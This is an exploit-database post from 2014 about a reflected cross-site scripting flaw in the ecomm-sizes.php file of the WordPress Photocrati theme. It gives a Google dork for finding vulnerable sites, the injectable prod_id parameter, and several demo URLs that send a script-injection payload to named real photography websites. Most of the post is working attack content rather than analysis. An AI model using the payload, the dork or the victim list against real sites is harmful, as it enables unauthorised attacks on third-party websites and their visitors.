Home / exploits WordPress Photocrati Cross Site Scripting
Posted on 30 January 2014
###################### # Exploit Title : Wordpress Photocrati-theme Cross Site Scripting # Exploit Author : ACC3SS # Vendor Homepage : http://www.photocrati.com # Google Dork : inurl : inurl:wp-content/themes/photocrati-theme/photocrati-gallery # Date : 2014-01-29 # Tested on : Windows 7 ###################### # Location : localhost/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=[Xss] ###################### # Demo : # http://abandonphotography.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id= "/><script>alert(1);</script> # http://remingtonphotographyohio.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id= "/><script>alert(1);</script> # http://stephimals.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id= "/><script>alert(1);</script> # http://justinsweet.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id= "/><script>alert(1);</script> # http://riseupgallery.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id= "/><script>alert(1);</script> ######################
